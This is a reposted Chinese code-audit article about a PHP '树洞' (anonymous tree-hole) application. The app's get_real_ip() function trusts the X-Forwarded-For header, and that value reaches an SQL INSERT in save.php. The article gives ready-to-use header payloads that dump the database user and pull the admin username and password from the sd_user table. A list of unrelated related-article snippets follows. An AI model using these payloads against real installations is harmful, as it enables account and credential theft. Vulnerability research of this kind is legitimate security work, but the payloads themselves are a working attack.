php x forwarded for,代码审计树洞X_FORWARDED_FOR注入
原创: wwt 合天智汇
官网:https://yun.aoaoao.me/
/includes/function.php 36-52 行
function get_real_ip(){
$ip=false;
if(!empty($_SERVER["HTTP_CLIENT_IP"])){
$ip = $_SERVER["HTTP_CLIENT_IP"];
}
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ips = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']);
if ($ip) { array_unshift($ips, $ip); $ip = FALSE; }
for ($i = 0; $i < count($ips); $i++) {
if (!eregi ("^(10|172\.16|192\.168)\.", $ips[$i])) {
$ip = $ips[$i];
break;
}
}
}
return ($ip ? $ip : $_SERVER['REMOTE_ADDR']);
}
获取HTTP_X_FORWARDED_FOR
HTTP_X_FORWARDED_FOR是可以用户自定义的
没做什么过滤 取出函数输出一波
看到输出就知道了一切(其实不看也知道)( ̄▽ ̄*)
全局查找get_real_ip() IP功能一般在用户登陆 注册 留言 这些是比较常见的
/includes/save.php 23-28 行
INSERT 注入原理我这里就不讲了
带上 ming 参数 (post)
构造payload
X-Forwarded-For: 1.1.1.1',user(),'0',1,1); #
ming=123
爆用户名: X-Forwarded-For: 1.1.1.1',(select username from sd_user where id=1),'0',uid,uid); #
爆密码: X-Forwarded-For: 1.1.1.1',(select pwdfrom sd_user where id=1),'0',uid,uid); #
(注:本文属于合天原创投稿奖励,未经允许,禁止转载!)
php x forwarded for,代码审计树洞X_FORWARDED_FOR注入相关推荐
- 在树洞里,渝粤题库在线整理
在树洞里 在树洞里,我看到了一些领国家助学金的同学大手大脚,也看到了一些同学好像并不困难,我更看到了许多拿了学校的奖励,可是连写感谢信都不愿意写,觉得很麻烦的同学.我想把我的故事讲给你们听. 我来自单 ...
- 好看的粉色树洞表白墙网站源码
简介: 带来一个不错的树洞表白墙 UI设计的很人性化,很美观. 这是1.3版本免授权的,相当于体验版本 功能: QQ黑名单 IP黑名单 用户管理 内容管理 演示图其他功能为2.1版本的 演示站点版本: ...
- CH Round #72树洞[二分答案 DFSBFS]
树洞 CH Round #72 - NOIP夏季划水赛 描述 在一片栖息地上有N棵树,每棵树下住着一只兔子,有M条路径连接这些树.更特殊地是,只有一棵树有3条或更多的路径与它相连,其它的树只有1条或2 ...
- 树洞程序php,Anonymous – 秘密 PHP树洞程序
释放双眼,带上耳机,听听看~! 源码简介 利用Anonymous可以快速的建立一个社区,用户可以以匿名的方式发表一些内容,类似于国内的树洞程序.有兴趣的可以百度一下树洞. 程序基于CI框架,响应式布局 ...
- 树洞程序php,Anonymous v20200926 – 秘密 PHP树洞程序
释放双眼,带上耳机,听听看~! 源码简介 利用Anonymous可以快速的建立一个社区,用户可以以匿名的方式发表一些内容,类似于国内的树洞程序.有兴趣的可以百度一下树洞. 程序基于Laravel框架, ...
- 树洞OCR文字识别v1.1.0官方版
树洞OCR文字识别是一款跨平台文字识别小工具,使用了各云平台开发的识别接口,因此需要联网才能正常使用,可以在程序主界面点击截图按钮,也可以点击截图快捷键F4! 使用方法: 启动截图 方法一:在程序主界 ...
- 树洞外链更新至2.2-支持本地/远程储存,新增用户系统
更新亮点 相比2.1版本的更新亮点: 新增多用户系统,用户可以查看,管理自己的文件,分享 新增本地.远程两种储存方式,后台可自由设置不同用户组对应不同存储方式 用户管理 更新细节 2.2: 新增用户系 ...
- 好用的个人树洞外链系统程序源码
正文: 树洞外链是一款开源的PHP外链系统,界面UI简洁大气,支持阿里OSS.又拍OSS.七牛OSS.本地服务器.远程五种储存方式,支持多用户系统. 下载方式: lanzou.com/iKXKC035 ...
- 树洞外链网盘系统php源码去除底部版权优化版
树洞外链一款支持对接多家云存储的多功能网盘系统你除了可以将网盘文件储存在服务器硬盘之外,它还能快速对接国内外多家云存储平台,将文件通通储存到阿里云 OSS.腾讯云 COS.七牛.又拍云.亚马逊 AWS ...
- 私人网盘树洞外链源码
介绍: 树洞外链是一款免费开源的PHP外链网盘系统,界面简洁友好,支持阿里云OSS.又拍云.七牛.本地.远程五种储存方式,支持多用户系统. 程序特性: 支持多种存储方式 树洞外链允许你将文件存放在不同 ...
最新文章
- MySQL-数据库监控初探
- 很慌!一次惊心动魄的服务器误删文件的恢复过程
- ab压力测试(了解ab工具,实验对网页进行测试)
- linux at查看进程命令,at命令 - Linux命令大全 | linux教程
- 前端学习(2659):组件间传参
- 让皮肤美白细致的七大DIY - 生活至上,美容至尚!
- 飞鸽传书写每行都认认真真
- bzoj 1057: 棋盘制作(悬线法)
- 聊天社交即时通信源码IM 群聊/语音/视频/红包支付/不依赖第三方sdk即时通讯
- Mac上qmc0文件转码为mp3
- zipf定律与相似性度量
- 笔记本无法启用免费wifi
- android 录屏功能,Android开发如何实现录屏小功能
- vb.net 换行符的转换
- 基于Java开发一套完整的区块链系统(附源码)
- java 罗马数字_JAVA,罗马数字与阿拉伯数字的互转
- linux snap 原理,snap,snap和Snappy指的是什么?
- IDEA 插件的设置和引用,以及插件库
- 《软件开发沉思录》之对象健身操
- js弹出对话确认框插件